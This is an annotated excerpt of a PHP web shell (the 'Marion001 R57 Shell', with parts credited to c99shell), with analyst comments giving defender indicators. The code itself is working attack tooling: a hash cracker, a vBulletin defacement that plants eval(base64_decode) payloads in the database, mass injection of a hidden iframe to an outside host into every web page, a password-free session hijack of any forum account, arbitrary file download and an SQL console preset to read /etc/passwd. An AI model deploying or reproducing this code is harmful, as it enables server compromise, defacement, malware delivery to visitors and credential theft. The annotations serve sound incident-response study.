  502. </center></td><td><center><form target="_blank" action="http://www.csthis.com/md5/index.php" method=POST>
  503. <input type=text size=40 name=h> <input type=submit value="Submit"></form></center></td></tr></table><br><center>
  504. <?php
  // Dictionary check of a hash against a word list. `type` is limited to md5 or sha1 by
  // the condition below and is then called as a variable function on each trimmed word.
  // `wordlist` is a path taken from the query string and read with file(), so this
  // branch also reads whatever file the PHP process can open.
  // Defender notes: the hash, wordlist and type parameters travel in the URL and are
  // therefore visible in access logs.
  505. if (isset($_GET['hash']) && isset($_GET['wordlist']) && ($_GET['type'] == 'md5' || $_GET['type'] == 'sha1')) {
  506.         $type = $_GET['type'];
  507.         $hash = $_GET['hash'];
  508.         $count = 1;
  509.         $wordlist = file($_GET['wordlist']);
  510.         $words = count($wordlist);
  511.         foreach ($wordlist as $word) {
  // Each candidate word is echoed to the page unescaped as progress output.
  512.                 echo $count.' of '.$words.': '.$word.'<br>';
  513.                 if ($hash == $type(rtrim($word))) {
  514.                         echo '<font color=red>Great success!  The password is: '.$word.'</font><br>';
  515.                         exit;
  516.                 }
  517.                 ++$count;
  518.         }
  519. }
  520. }
  521. if($_GET['act']=="fsbuff")
  522. {
  523.  $arr_copy = $sess_data["copy"];
  524.  $arr_cut = $sess_data["cut"];
  525.  $arr = array_merge($arr_copy,$arr_cut);
  526.  if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  527.  else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
  528. }
  // Self-remove: deletes this script with unlink(__FILE__) once the submitted value
  // equals the three-digit confirmation code; otherwise it prints the confirmation form.
  // NOTE(review): $submit, $rndcode, $surl, $shver and c99shexit() are not defined in the
  // visible listing, and the message names "c99shell"; presumably this block was lifted
  // from that shell. Confirm against the full sample.
  // Defender notes: a missing file at triage does not rule out earlier use. Requests with
  // act=selfremove in the access log, and the "Thanks for using c99shell" string as a
  // content signature, are the indicators this block offers.
  529. if($_GET['act']=="selfremove")
  530. {
  531.  if (($submit == $rndcode) and ($submit != ""))
  532.  {
  533.   if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
  534.   else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  535.  }
  536.  else
  537.  {
  538.   if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
  539.   $rnd = rand(0,9).rand(0,9).rand(0,9);
  540.   echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>";
  541.  }
  542. }
  543. if($_GET['act']=="deface") {
  544. echo $head; echo "
  545. <center><h2 class='style1'>Vbulletin Deface</h2><div id=haberler align=left><form method=POST action=''>
  546. <p align=center class='style1'> </p><div class='style3' align=center>
  547. <span class='style2'>Host</span><font face='Arial' color='#ffffff'>:</font><span class='style1'><input type=text name=dbh value=localhost size='15' ></span>
  548. <font face='Arial' color='#ffffff'> Database Name:</font><span class='style1'><input type=text name=dbn size='15' ><br>Database User
  549. </span><font face='Arial' color='#ffffff'>:</font><span class='style1'><input type=text name=dbu size='15' ></span>
  550. <font face='Arial' color='#ffffff'> Database Pass:  </font><span class='style1'><input type=text name=dbp size='16' ><br></span></div>
  551. <center class='style1'><textarea name=index rows='5' cols='33' >echo '_____ Marion001-VietNam _____';</textarea></center>
  552. <center class='style1'><input type=submit value='Deface It!!!' ></form></center></center></body></center>";
  // Database-side defacement of a vBulletin install, using MySQL credentials from the
  // POST body (dbh, dbn, dbu, dbp). It overwrites the `template` rows titled
  // 'spacer_open' and 'FORUMHOME', and the `css` column of the `style` table, with a
  // `{${eval(base64_decode('...'))}}{${exit()}}` string followed by the marker below.
  // The UPDATE on `style` has no WHERE clause, so every row in that table is rewritten
  // and its stylevars/csscolors/editorstyles columns are emptied.
  // The mysql_* functions used here were removed in PHP 7.0, so this handler only runs
  // on legacy PHP 5 hosts.
  // Defender notes: search template.template and style.css for "eval(base64_decode" or
  // the "[Edited] by Marion001" marker, restore those tables from a known-good backup,
  // and rotate the database credentials.
  553. $h4cker="[Edited] by Marion001";
  554. if (!empty($_POST['dbh']) && !empty($_POST['dbn']) && !empty($_POST['dbu']) && !empty($_POST['index']))
  555. {
  556. $dbh = $_POST['dbh'];
  557. $dbn = $_POST['dbn'];
  558. $dbu = $_POST['dbu'];
  559. $dbp = $_POST['dbp'];
  560. $index=str_replace("\'","'",$index);
  561. $set_index  = "{\${eval(base64_decode(\'".base64_encode($index);
  562. //$set_index .= base64_encode("eval ('$index');");
  563. $set_index .= "\'))}}{\${exit()}}";
  564. mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
  565. $fatal1 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='spacer_open'";
  566. $fatal2 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='FORUMHOME'";
  567. $fatal3 = "UPDATE style SET css='".$set_index."".$h4cker."', stylevars='', csscolors='', editorstyles=''";
  568. $result = mysql_query($fatal1) or die (mysql_error());
  569. $result2 = mysql_query($fatal2) or die (mysql_error());
  570. $result3 = mysql_query($fatal3) or die (mysql_error());
  571. if ($result && $result2 && $result3) echo "<center>Done!!!</center>";
  572. }
  573. }
  574. if($_GET['act']=="massbrowsersploit"){
  575. echo $head;
  576. ?><body>Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.<br><br>
  577. <form action="" method=GET><input type=hidden name="masssploit" value="goahead"><input type=hidden name="act" value="massbrowsersploit">
  578. <table border=0><tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"> <-- default is dir this shell is in</td></tr>
  579. <tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<IFRAME src="http://omegakd.net" width=0 height=0 frameborder=0></IFRAME>'); ?></textarea> <-- best bet would be to include an invisible iframe of browser exploits</td></tr>
  580. <tr><td><input type=submit value="Inject Code"></td></tr></table></form>
  581. <?php
  // Mass content injection: appends the request-supplied `injectthis` text to every
  // *.php, *.htm and *.html file directly inside `pathtomass`. glob() is used without
  // recursion, so subdirectories are not visited. The form above pre-fills a zero-size
  // iframe pointing at omegakd.net.
  // Defender notes: the form submits via GET, so masssploit=goahead, pathtomass and the
  // injected markup appear in the access log. On disk, look for identical trailing bytes
  // after the normal end of many files, modified within the same few seconds; file
  // integrity monitoring on web roots catches this directly.
  582. if ($_GET['masssploit'] == 'goahead') {
  583.         if (is_dir($_GET['pathtomass'])) {
  584.                 $lolinject = $_GET['injectthis'];
  585.                 foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) {
  586.                         $fp=fopen($injectj00,"a+");
  587.                         if (fputs($fp,$lolinject)){
  588.                                 echo $injectj00.' was injected<br>';
  589.                         } else {
  590.                                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  591.                         }
  592.                 }
  593.                 foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) {
  594.                         $fp=fopen($injectj00,"a+");
  595.                         if (fputs($fp,$lolinject)){
  596.                                 echo $injectj00.' was injected<br>';
  597.                         } else {
  598.                                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  599.                         }
  600.                 }
  601.                 foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) {
  602.                         $fp=fopen($injectj00,"a+");
  603.                         if (fputs($fp,$lolinject)){
  604.                                 echo $injectj00.' was injected<br>';
  605.                         } else {
  606.                                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  607.                         }
  608.                 }
  609.         } else {
  610.                 echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>';
  611.         }
  612. }
  613. ?>
  614. </body></html>
  615. <?
  616. }
  // [analyst note] Handler for ?act=fakelogin, aimed at a vBulletin installation on the same host.
  // On submit it require_once()s two POST-supplied paths (form defaults: ./global.php and
  // ./includes/functions_login.php), reads the named user's row, sets the 'userid' and
  // 'password' cookies from the stored values and calls the forum's own login helpers -
  // a session for that user is created without the user's password ever being supplied.
  // Observations for responders:
  //  - the two require_once() paths are taken verbatim from the request;
  //  - the username is concatenated into the SQL text without escaping;
  //  - after an incident involving this file, forum sessions and stored credentials should be
  //    treated as exposed (NOTE(review): rotating the cookie salt and forcing password resets
  //    is the usual response - confirm against the forum vendor's guidance).
  617. if($_GET['act']=="fakelogin"){
  618. echo '<form name=form method=POST><b>Username : </b><input name="user" size="45" value="" type="text"><br/>Path global.php : </b><input name="global" size="45" value="./global.php" type="text"><br/>
  619. <b>Path functions_login.php : </b><input name="login" size="45" value="./includes/functions_login.php" type="text"><br/><input name="submit" size="2" value="Login" type="submit"></form>';
  620. if ($_POST['submit']){
  621. define('THIS_SCRIPT', 'login');
  622. echo $_POST['global'];
  623. require_once($_POST['global']);
  624. require_once($_POST['login']);
  625. $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_POST['user'] . "'");
  626. if (!$vbulletin->userinfo['userid']) echo "Invalid username!";
  627. else
  628. {
  629. echo $_POST['login'];
  // Cookie values are derived from the stored hash and COOKIE_SALT, both provided by the included forum code.
  630. vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
  631. vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
  632. exec_unstrike_user($_POST['user']);
  633. process_new_login('cplogin', TRUE, TRUE);
  634. do_login_redirect();
  635. }}}
  636. echo "</table><br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div></body></html>";
  637. exit();
  638. }
  639. //Tools Hacking End
  640.  
  // [analyst note] Global setup for the shell's main UI.
  // $userful and $downloaders are lists of program names (compilers, interpreters, archive
  // and transfer tools); how they are used is outside this excerpt.
  641. $language='eng';
  642. $auth = 0;
  643. $userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
  644. $downloaders = array('wget','fetch','lynx','links','curl','get');
  // Lifts the execution time limit and turns off output buffering; @ hides any failure.
  645. @ini_set('max_execution_time',0);
  646. @ini_set('output_buffering',0);
  // getmicrotime() is defined elsewhere in the file.
  647. define("starttime",getmicrotime());
  648. $safe_mode = @ini_get('safe_mode');
  649. $version = 'TheSunOfVN Edition';
  650. $footer = '<div align=center><font face=Verdana size=-2><b>o---[  Marion001 R57 Shell ]---o</b></font></div>';
  // $open_basedir becomes 1 when ini_get() is unavailable or when open_basedir /
  // safe_mode_include_dir is configured, otherwise 0.
  651. if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
  // Same two settings as above, repeated with an ini_alter() fallback when ini_set() is missing.
  652. if(@function_exists('ini_set'))
  653.  {
  654.  @ini_set('max_execution_time',0);
  655.  @ini_set('output_buffering',0);
  656.  }
  657. else
  658.  {
  659.  @ini_alter('max_execution_time',0);
  660.  @ini_alter('output_buffering',0);
  661.  }
  // Compatibility shim for PHP older than 4.1.0: point the superglobals at the legacy $HTTP_*_VARS arrays.
  662. if(version_compare(phpversion(), '4.1.0') == -1)
  663.  {
  664.  $_POST   = &$HTTP_POST_VARS;
  665.  $_GET    = &$HTTP_GET_VARS;
  666.  $_SERVER = &$HTTP_SERVER_VARS;
  667.  $_COOKIE = &$HTTP_COOKIE_VARS;
  668.  }
  // The braces below are not attached to any condition, so backslashes are stripped from
  // every POST and COOKIE value on every request.
  669.  {
  670.  foreach ($_POST as $k=>$v)
  671.   {
  672.   $_POST[$k] = stripslashes($v);
  673.   }
  674.  foreach ($_COOKIE as $k=>$v)
  675.   {
  676.   $_COOKIE[$k] = stripslashes($v);
  677.   }
  678.  }
  // Optionally compresses a file body before it is sent as a download.
  //   $filename (by reference) - gets '.bz2', '.gz' or '.zip' appended to match the format used
  //   $filedump (by reference) - raw file content, replaced by the compressed bytes
  //   $compress                - 'bzip', 'gzip' or 'zip'; any other value leaves the data untouched
  // Results are also passed back through the globals $mime_type and (gzip only) $content_encoding.
  // A format is used only if the matching PHP function exists; otherwise the code falls through
  // to the uncompressed 'application/octet-stream' case. The zipfile class is not defined in
  // this excerpt.
  679. function compress(&$filename,&$filedump,$compress)
  680.  {
  681.     global $content_encoding;
  682.     global $mime_type;
  683.     if ($compress == 'bzip' && @function_exists('bzcompress'))
  684.      {
  685.         $filename  .= '.bz2';
  686.         $mime_type = 'application/x-bzip2';
  687.         $filedump = bzcompress($filedump);
  688.      }
  689.      else if ($compress == 'gzip' && @function_exists('gzencode'))
  690.      {
  691.         $filename  .= '.gz';
  692.         $content_encoding = 'x-gzip';
  693.         $mime_type = 'application/x-gzip';
  694.         $filedump = gzencode($filedump);
  695.      }
  696.      else if ($compress == 'zip' && @function_exists('gzcompress'))
  697.      {
  698.         $filename .= '.zip';
  699.         $mime_type = 'application/zip';
  700.         $zipfile = new zipfile();
  // substr(..., 0, -4) removes the '.zip' just appended, so the archive entry keeps the original name.
  701.         $zipfile -> addFile($filedump, substr($filename, 0, -4));
  702.         $filedump = $zipfile -> file();
  703.      }
  704.      else
  705.      {
  706.         $mime_type = 'application/octet-stream';
  707.      }
  708.  }
  // [analyst note] Small database wrapper behind the shell's SQL console and table dump.
  // $db selects the backend ('MySQL', 'MSSQL', 'PostgreSQL' or 'Oracle'). Every driver call is
  // prefixed with @, so driver warnings are suppressed instead of being reported.
  // The mysql_*, mssql_* and oci* names used here belong to older PHP database extensions.
  709. class my_sql
  710.  {
  711.  var $host = 'localhost';
  712.  var $port = '';
  713.  var $user = '';
  714.  var $pass = '';
  715.  var $base = '';
  716.  var $db   = '';
  717.  var $connection;
  718.  var $res;
  719.  var $error;
  720.  var $rows;
  721.  var $columns;
  722.  var $num_rows;
  723.  var $num_fields;
  724.  var $dump;
  // Opens a connection for the selected backend.
  // Returns 1 on success; 0 when the driver function is missing, the backend name is unknown
  // or the connection attempt fails. An empty $port is replaced by the backend default
  // (3306 / 1433 / 5432). The Oracle branch uses only $user, $pass and $base.
  725. function connect()
  726.   {
  727.         switch($this->db)
  728.      {
  729.          case 'MySQL':
  730.           if(empty($this->port)) { $this->port = '3306'; }
  731.           if(!function_exists('mysql_connect')) return 0;
  732.           $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
  733.           if(is_resource($this->connection)) return 1;
  734.          break;
  735.      case 'MSSQL':
  736.       if(empty($this->port)) { $this->port = '1433'; }
  737.           if(!function_exists('mssql_connect')) return 0;
  738.           $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
  739.       if($this->connection) return 1;
  740.      break;
  741.      case 'PostgreSQL':
  742.       if(empty($this->port)) { $this->port = '5432'; }
  743.       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
  744.       if(!function_exists('pg_connect')) return 0;
  745.       $this->connection = @pg_connect($str);
  746.       if(is_resource($this->connection)) return 1;
  747.      break;
  748.      case 'Oracle':
  749.       if(!function_exists('ocilogon')) return 0;
  750.       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
  751.       if(is_resource($this->connection)) return 1;
  752.      break;
  753.      }
  754.     return 0;
  755.   }
  756.  
  // Selects $base on MySQL/MSSQL (1 on success, 0 on failure). PostgreSQL and Oracle always
  // return 1 because connect() already passed the database name for those backends.
  757.  function select_db()
  758.   {
  759.    switch($this->db)
  760.     {
  761.         case 'MySQL':
  762.          if(@mysql_select_db($this->base,$this->connection)) return 1;
  763.     break;
  764.     case 'MSSQL':
  765.          if(@mssql_select_db($this->base,$this->connection)) return 1;
  766.     break;
  767.     case 'PostgreSQL':
  768.      return 1;
  769.     break;
  770.     case 'Oracle':
  771.      return 1;
  772.     break;
  773.     }
  774.    return 0;
  775.   }
  776.  
  // Runs $query and stores the result handle in $res.
  // Returns 0 on error (message in $error), otherwise 1 or 2:
  //   MySQL      - 1 when a result resource came back, 2 otherwise
  //   MSSQL / PG - 1 when the result has rows, 2 otherwise
  //   Oracle     - reversed: 2 when ocirowcount() is non-zero, 1 otherwise
  // MySQL statements are sent with a leading comment that contains a NUL byte
  // ('/*' . chr(0) . '*/'). Why is not shown in this file; for defenders it is a distinctive
  // prefix to search for in MySQL general or audit logs.
  777.  function query($query)
  778.   {
  779.    $this->res=$this->error='';
  780.    switch($this->db)
  781.     {
  782.         case 'MySQL':
  783.      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  784.       {
  785.       $this->error = @mysql_error($this->connection);
  786.       return 0;
  787.       }
  788.      else if(is_resource($this->res)) { return 1; }
  789.      return 2;
  790.         break;
  791.     case 'MSSQL':
  792.      if(false===($this->res=@mssql_query($query,$this->connection)))
  793.       {
  794.       $this->error = 'Query error';
  795.       return 0;
  796.       }
  797.       else if(@mssql_num_rows($this->res) > 0) { return 1; }
  798.      return 2;
  799.     break;
  800.     case 'PostgreSQL':
  801.      if(false===($this->res=@pg_query($this->connection,$query)))
  802.       {
  803.       $this->error = @pg_last_error($this->connection);
  804.       return 0;
  805.       }
  806.       else if(@pg_num_rows($this->res) > 0) { return 1; }
  807.      return 2;
  808.     break;
  809.     case 'Oracle':
  810.      if(false===($this->res=@ociparse($this->connection,$query)))
  811.       {
  812.       $this->error = 'Query parse error';
  813.       }
  814.      else
  815.       {
  816.       if(@ociexecute($this->res))
  817.        {
  818.        if(@ocirowcount($this->res) != 0) return 2;
  819.        return 1;
  820.        }
  821.       $error = @ocierror();
  822.       $this->error=$error['message'];
  823.       }
  824.     break;
  825.     }
  826.   return 0;
  827.   }
  // Reads every row of $res into $rows (associative arrays) and the column names of the first
  // row into $columns, then frees the result. Returns 1 when at least one row was read, else 0.
  // The fetch loops assign into $rows[] before testing, so the terminating false is stored as
  // a final extra element; the callers in this excerpt iterate by $num_rows.
  828.  function get_result()
  829.   {
  830.    $this->rows=array();
  831.    $this->columns=array();
  832.    $this->num_rows=$this->num_fields=0;
  833.    switch($this->db)
  834.     {
  835.         case 'MySQL':
  836.          $this->num_rows=@mysql_num_rows($this->res);
  837.          $this->num_fields=@mysql_num_fields($this->res);
  838.          while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
  839.          @mysql_free_result($this->res);
  840.          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  841.     break;
  842.     case 'MSSQL':
  843.          $this->num_rows=@mssql_num_rows($this->res);
  844.          $this->num_fields=@mssql_num_fields($this->res);
  845.          while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
  846.          @mssql_free_result($this->res);
  847.          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
  848.     break;
  849.     case 'PostgreSQL':
  850.          $this->num_rows=@pg_num_rows($this->res);
  851.          $this->num_fields=@pg_num_fields($this->res);
  852.          while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
  853.          @pg_free_result($this->res);
  854.          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  855.     break;
  856.     case 'Oracle':
  857.      $this->num_fields=@ocinumcols($this->res);
  858.      while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
  859.      @ocifreestatement($this->res);
  860.      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  861.     break;
  862.     }
  863.    return 0;
  864.   }
  // Builds a textual dump of $table in $this->dump: six '##' header lines, then (MySQL only)
  // the SHOW CREATE TABLE output, then one INSERT statement per row.
  // Returns 1 on success; 0 for an empty table name, an unknown backend, or when a query
  // fails or yields no rows. The Oracle branch only writes a placeholder and returns 1.
  // $table is concatenated into the SQL text as given.
  865.  function dump($table)
  866.   {
  867.    if(empty($table)) return 0;
  868.    $this->dump=array();
  869.    $this->dump[0] = '##';
  870.    $this->dump[1] = '## --------------------------------------- ';
  871.    $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
  872.    $this->dump[3] = '## Database: '.$this->base;
  873.    $this->dump[4] = '##    Table: '.$table;
  874.    $this->dump[5] = '## --------------------------------------- ';
  875.    switch($this->db)
  876.     {
  877.         case 'MySQL':
  878.          $this->dump[0] = '## MySQL dump';
  879.          if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
  880.          if(!$this->get_result()) return 0;
  881.          $this->dump[] = $this->rows[0]['Create Table'];
  882.      $this->dump[] = '## --------------------------------------- ';
  883.          if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
  884.          if(!$this->get_result()) return 0;
  885.          for($i=0;$i<$this->num_rows;$i++)
  886.           {
  887.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
  888.           $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  889.           }
  890.     break;
  891.     case 'MSSQL':
  892.      $this->dump[0] = '## MSSQL dump';
  893.      if($this->query('SELECT * FROM '.$table)!=1) return 0;
  894.          if(!$this->get_result()) return 0;
  895.          for($i=0;$i<$this->num_rows;$i++)
  896.           {
  897.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  898.           $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  899.           }
  900.     break;
  901.     case 'PostgreSQL':
  902.      $this->dump[0] = '## PostgreSQL dump';
  903.      if($this->query('SELECT * FROM '.$table)!=1) return 0;
  904.          if(!$this->get_result()) return 0;
  905.          for($i=0;$i<$this->num_rows;$i++)
  906.           {
  907.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  908.           $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  909.           }
  910.     break;
  911.     case 'Oracle':
  912.       $this->dump[0] = '## ORACLE dump';
  913.       $this->dump[]  = '## under construction';
  914.     break;
  915.     default:
  916.      return 0;
  917.     break;
  918.     }
  919.    return 1;
  920.   }
  // Closes the connection for the selected backend; unknown backends are ignored.
  921.  function close()
  922.   {
  923.    switch($this->db)
  924.     {
  925.         case 'MySQL':
  926.          @mysql_close($this->connection);
  927.     break;
  928.     case 'MSSQL':
  929.      @mssql_close($this->connection);
  930.     break;
  931.     case 'PostgreSQL':
  932.      @pg_close($this->connection);
  933.     break;
  934.     case 'Oracle':
  935.      @oci_close($this->connection);
  936.     break;
  937.     }
  938.   }
  // Returns the driver's affected-row count for $res, or 0 for an unknown backend.
  939.  function affected_rows()
  940.   {
  941.    switch($this->db)
  942.     {
  943.         case 'MySQL':
  944.          return @mysql_affected_rows($this->res);
  945.     break;
  946.     case 'MSSQL':
  947.      return @mssql_affected_rows($this->res);
  948.     break;
  949.     case 'PostgreSQL':
  950.      return @pg_affected_rows($this->res);
  951.     break;
  952.     case 'Oracle':
  953.      return @ocirowcount($this->res);
  954.     break;
  955.     default:
  956.      return 0;
  957.     break;
  958.     }
  959.   }
  960.  }
  // [analyst note] POST cmd=download_file: reads the file named in d_name (whatever path the
  // web-server account can open), optionally compresses it with compress(), and returns it
  // as an attachment before exiting. err() is defined elsewhere in the file.
  // Defender note: the parameters are in the POST body, which access logs usually do not
  // record, so the visible trace may be only a POST to this script with a sizeable response.
  961. if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
  962.  {
  963.   if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
  964.   else
  965.    {
  // Discard anything already buffered so the response body is only the file content.
  966.     @ob_clean();
  967.     $filename = @basename($_POST['d_name']);
  968.     $filedump = @fread($file,@filesize($_POST['d_name']));
  969.     fclose($file);
  970.     $content_encoding=$mime_type='';
  971.     compress($filename,$filedump,$_POST['compress']);
  972.     if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
  973.     header("Content-type: ".$mime_type);
  974.     header("Content-disposition: attachment; filename=\"".$filename."\";");
  975.     echo $filedump;
  976.     exit();
  977.    }
  978.  }
  // [analyst note] ?phpinfo prints the full phpinfo() page (configuration, loaded modules,
  // environment) followed by a BACK link, then stops. Requests carrying a bare 'phpinfo'
  // query parameter are a simple thing to search for in access logs.
  979. if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  980.  
  981.  
  // [analyst note] POST cmd=db_query: ad-hoc SQL console. Backend type, host, port, login,
  // password and database name all come from the POST body. The statement text is split on
  // ';' and fragments of five characters or fewer are skipped.
  982. if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
  983.  {
  984.  echo $head;
  985.  $sql = new my_sql();
  986.  $sql->db   = $_POST['db'];
  987.  $sql->host = $_POST['db_server'];
  988.  $sql->port = $_POST['db_port'];
  989.  $sql->user = $_POST['mysql_l'];
  990.  $sql->pass = $_POST['mysql_p'];
  991.  $sql->base = $_POST['mysql_db'];
  992.  $querys = @explode(';',$_POST['db_query']);
  993.  echo '<body bgcolor=Black>';
  994.  if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=#2aff00><b>Can't connect to SQL server</b></font></div>";
  995.   else
  996.    {
  997.    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=#2aff00><b>Can't select database</b></font></div>";
  998.    else
  999.     {
  1000.     foreach($querys as $num=>$query)
  1001.      {
  1002.       if(strlen($query)>5)
  1003.       {
  1004.       echo "<font face=Verdana size=-2 color=#2aff00><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
  // query() returns the integers 0/1/2; the string case labels match through loose comparison.
  1005.       switch($sql->query($query))
  1006.        {
  1007.        case '0':
  1008.        echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
  1009.        break;
  1010.        case '1':
  1011.        if($sql->get_result())
  1012.         {
  1013.         echo "<table width=100% border=0 cellpadding=0 cellspacing=0>";
  1014.         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
  1015.         $keys = @implode(" </b></font></td><td class=main><font face=Verdana size=-2><b> ", $sql->columns);
  1016.         echo "<tr><td class=main bgcolor=#333333><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
  1017.         for($i=0;$i<$sql->num_rows;$i++)
  1018.          {
  1019.          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
  1020.          $values = @implode(" </font></td><td class=main><font face=Verdana size=-2> ",$sql->rows[$i]);
  1021.          echo '<tr><td class=main><font face=Verdana size=-2> '.$values.' </font></td></tr>';
  1022.          }
  1023.         echo "</table>";
  1024.         }
  1025.      break;
  1026.        case '2':
  1027.        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
  1028.        echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
  1029.        break;
  1030.        }
  1031.       }
  1032.      }
  1033.     }
  // The database/table listing below calls mysql_query() directly instead of going through
  // $sql, so it is tied to the MySQL extension whatever backend was chosen.
  1034.     echo "<br><div align=left id='n'><table width=100% height=60 border=0 cellpadding=0 cellspacing=0>";
  1035.     echo "<tr><td align=center><b>Show Database</b></td><td align=center><b>Show Tables</b></td></tr>";
  1036.     echo "<tr><td><textarea cols=50 rows=6 name=query_db>";
  1037.     $query_db = mysql_query("SHOW DATABASES;");
  1038.     while ($query_db_row = mysql_fetch_array($query_db))
  1039.     {
  1040.         echo $query_db_row[0]."\n";
  1041.     }
  1042.     echo "</textarea></td><td><div align=right><textarea cols=60 rows=6 name=query_tables>";
  1043.     if (($_POST['mysql_db']) && $sql->select_db())
  1044.     {
  1045.      $query_tables = mysql_query("SHOW TABLES;");
  1046.      while ($query_tables_row = mysql_fetch_array($query_tables))
  1047.      {
  1048.         echo $query_tables_row[0]."\n";
  1049.      }
  1050.     }
  1051.     echo "</textarea></div></td></tr></table></div>";
  1052.    }
  // The connection settings, including the database password, are passed to in() as hidden
  // fields for the next request. in() and ws() are defined elsewhere; presumably in() renders
  // an <input> element - unconfirmed from this excerpt.
  1053.  echo "<br><form name=form method=POST>";
  1054.  echo in('hidden','db',0,$_POST['db']);
  1055.  echo in('hidden','db_server',0,$_POST['db_server']);
  1056.  echo in('hidden','db_port',0,$_POST['db_port']);
  1057.  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
  1058.  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
  1059.  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
  1060.  echo in('hidden','cmd',0,'db_query');
  1061.  echo "<div align=center>";
  1062.  echo "<font face=Verdana size=-2><b>Use database: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
  1063.  echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
  1064.  echo "<div align=center><font face=Verdana size=-2><b>Load file: </b><input type=text name=loadfile size=100 value=".(!empty($_POST['loadfile'])?($_POST['loadfile']):("/etc/passwd")).">".ws(2)."<input type=submit name=submit value=\" Load \"><br /><br />";
